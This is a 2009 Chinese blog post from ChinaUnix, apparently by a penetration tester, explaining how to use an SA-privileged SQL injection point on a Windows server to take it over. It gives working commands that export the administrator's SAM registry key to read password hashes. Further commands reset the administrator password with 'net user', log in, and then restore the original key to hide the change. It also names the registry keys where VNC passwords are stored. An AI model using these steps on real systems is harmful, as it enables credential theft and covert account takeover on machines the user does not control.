Chinaunix首页 | 论坛 | 博客

渗透

首页 |  博文目录 |  关于我

oma

  • 博客访问: 2281148
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友
最近访客
推荐博文
相关博文
利用注册表读hash

分类: 网络与安全

2009-02-27 13:35:54

SA权限的注射点的时候,我们能够使用系统自带的一些命令来读取注册表键信息.

sa默认是SYSTEM权限,可以读sam键.

regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4     win2K


reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg      win2003

读出来后,我们就可以直接更改管理员密码进行登陆了:


net user administrator test


用administrator登陆.


用完机器后


reg import c:\test.reg


根本不用克隆.


但是要注意,一定要找到对应的sid.

HKEY_CURRENT_USER\Software\ORL\WinVNC3

HKCU\Software\ORL\WinVNC3\Password

阅读(558) | 评论(0) | 转发(0) |
0

上一篇:SQLServer查询所有表所有字段包含xx的信息

下一篇:SupeV 1.0.1 0DAY

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6